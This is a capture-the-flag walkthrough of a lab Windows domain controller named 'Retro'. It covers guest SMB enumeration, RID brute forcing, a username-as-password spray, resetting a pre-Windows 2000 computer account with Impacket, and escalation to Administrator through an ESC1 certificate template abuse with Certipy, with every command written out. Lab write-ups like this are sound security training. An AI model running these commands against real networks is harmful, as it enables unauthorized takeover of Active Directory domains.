Retro is an easy difficulty machine where I had to enumerate open ports and services, leverage LDAP and SMB services to gain initial access, utilize credential brute forcing to discover simple passwords, and employ Impacket and Certipy to change credentials and exploit an ESC1 vulnerability for privilege escalation. The final step involved obtaining a TGT for the administrator to capture the root flag.

Enumeration

The Nmap scan shows the following ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PORT      STATE SERVICE
53/tcp    open  domain 
88/tcp    open  kerberos-sec 
135/tcp   open  msrpc
139/tcp   open  netbios-ssn  
389/tcp   open  ldap
445/tcp   open  microsoft-ds 
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
9389/tcp  open  adws

Guest login is enabled in the machine and I can see the shares using a username and null password.
netexec smb ip -u 'sz' -p '' --shares

I also used rid brute force to get users into the system.
netexec smb ip -u 'sz' -p '' --rid-brute

Password Guessing

In the Trainees shares there is a text file where it talks about making an simple password for trainees.

smbclient "//10.10.81.244/Trainees" -U "sz" --password=''

1
2
3
4
5
6
7
Dear Trainees,     
I know that some of you seemed to struggle with remembering strong and unique passwords. 
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.                                                                                                                                                      
                                                    
Regards                                                                                                                                                                                                                                                                                            
The Admins

Using the usernames earlier I can tried bruteforce with usernames as password and got trainees:trainees valid

netexec smb 10.10.81.244 -u user.txt -p user.txt -no-bruteforce

Pre-Windows 2000 Computers

I explored Notes share with trainee credentials and found another notes where it talked about Pre Created Computer Account
smbclient "//10.10.81.244/Notes" -U "trainee" --password='trainee'

1
2
3
4
5
6
7
Thomas,
       
after convincing the finance department to get rid of their ancienct banking software 
it is finally time to clean up the mess they made. We should start with the pre created computer account. That one is older than me.
       
Best   
James

After researching for a little bit I found this 2 article where it talked about how I can change the credentials of Pre-Windows 2000 Computers.

The Hacker Recipes
Trustedsec

As this is a financial department I used previously found user banking and got NT_STATUS_RESOURCE_NAME_NOT_FOUND which confirms its vulnerable.

smbclient -W retro.vl -U "banking" --password='banking' -L retro.vl

I also verified it with Netexec.

Next, I used Impacket to change the credentials and also create alternative credentials.

impacket-changepasswd retro.vl/banking$:[email protected] -newpass Password123 -altuser trainee -altpass trainee

ESC1

Using the new credential I enumerated ADCS and the machine was vulnerable to ESC1 attack.

certipy find -u 'banking$' -p 'Password123' -dc-ip 10.10.105.52 -enabled -vulnerable -stdout

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Certificate Templates                   
  0                                     
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA 
    Enabled                             : True        
    Client Authentication               : True        
    Enrollment Agent                    : False       
    Any Purpose                         : False       
    Enrollee Supplies Subject           : True        
    Certificate Name Flag               : EnrolleeSuppliesSubject  
    Enrollment Flag                     : None        
    Private Key Flag                    : 16842752    
    Extended Key Usage                  : Client Authentication 
    Requires Manager Approval           : False       
    Requires Key Archival               : False       
    Authorized Signatures Required      : 0           
    Validity Period                     : 1 year      
    Renewal Period                      : 6 weeks     
    Minimum RSA Key Length              : 4096        
    Permissions                         
      Enrollment Permissions            
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions        
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities                 
      ESC1

Using Certipy I requested .pfx key using the vulnerable template. Because of the Key Size error, I specified the key-size

certipy req -u 'banking$'@retro.vl -p 'Password123' -dc-ip 10.10.105.52 -ca retro-DC-CA -template RetroClients -upn [email protected] -key-size 4096

Next, Using the pfx key I requested TGT of the administrator.

certipy auth -pfx administrator.pfx -username Administrator -domain retro.vl -dc-ip 10.10.105.52

Using the TGT I can now login to the machine and get the flag.
wmiexec.py [email protected] -hashes <.....redacted......>